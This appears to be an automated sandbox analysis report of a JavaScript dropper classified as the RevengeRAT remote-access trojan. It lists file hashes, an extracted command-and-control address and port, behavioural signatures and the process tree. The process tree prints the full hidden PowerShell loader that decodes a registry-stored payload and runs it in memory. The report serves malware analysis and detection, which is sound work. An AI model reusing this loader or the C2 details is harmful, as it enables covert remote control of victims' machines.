Analysis
-
max time kernel
138s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-01-2025 03:27
Static task
static1
Behavioral task
behavioral1
Sample
9c8faa656313b10e7e2d76f25bc33bfddfbdf2582ba8fe8e0ed3a4ff2ad64c50.js
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
9c8faa656313b10e7e2d76f25bc33bfddfbdf2582ba8fe8e0ed3a4ff2ad64c50.js
Resource
win10v2004-20241007-en
General
-
Target
9c8faa656313b10e7e2d76f25bc33bfddfbdf2582ba8fe8e0ed3a4ff2ad64c50.js
-
Size
258KB
-
MD5
48f850f90ba9dd0390c5eb42d0f9bef2
-
SHA1
578f634534ca0f06f135f6b565f711dfe8d483c2
-
SHA256
9c8faa656313b10e7e2d76f25bc33bfddfbdf2582ba8fe8e0ed3a4ff2ad64c50
-
SHA512
5cbd65fccf50bf4166937c3f7060400af067d41822fea947e98ad11c6bbe9b045e08262ab635c7d6aeed2857facb9c639d319ca210b6f7d0d1f0ddccc85493b0
-
SSDEEP
6144:FGfkaSPcuBpSEGBfpmxD8k0+gHisTt0mCIqceOlgeyy7U00MXfKG:UfkaSPJ96
Malware Config
Extracted
revengerat
NyanCatRevenge
13.49.66.229:333
8a25aa6e78e44708a
Signatures
-
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
Revengerat family
-
Blocklisted process makes network request 17 IoCs
flow pid Process 14 2800 powershell.exe 17 2800 powershell.exe 21 2800 powershell.exe 22 2800 powershell.exe 25 2800 powershell.exe 37 2800 powershell.exe 38 2800 powershell.exe 39 2800 powershell.exe 40 2800 powershell.exe 41 2800 powershell.exe 43 2800 powershell.exe 45 2800 powershell.exe 47 2800 powershell.exe 55 2800 powershell.exe 56 2800 powershell.exe 57 2800 powershell.exe 58 2800 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2800 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2800 powershell.exe 2800 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2800 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 388 wrote to memory of 2800 388 wscript.exe 82 PID 388 wrote to memory of 2800 388 wscript.exe 82
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\9c8faa656313b10e7e2d76f25bc33bfddfbdf2582ba8fe8e0ed3a4ff2ad64c50.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:388 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\' -name 'KeyName').KeyName;$_b=$_b.replace('~','30');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82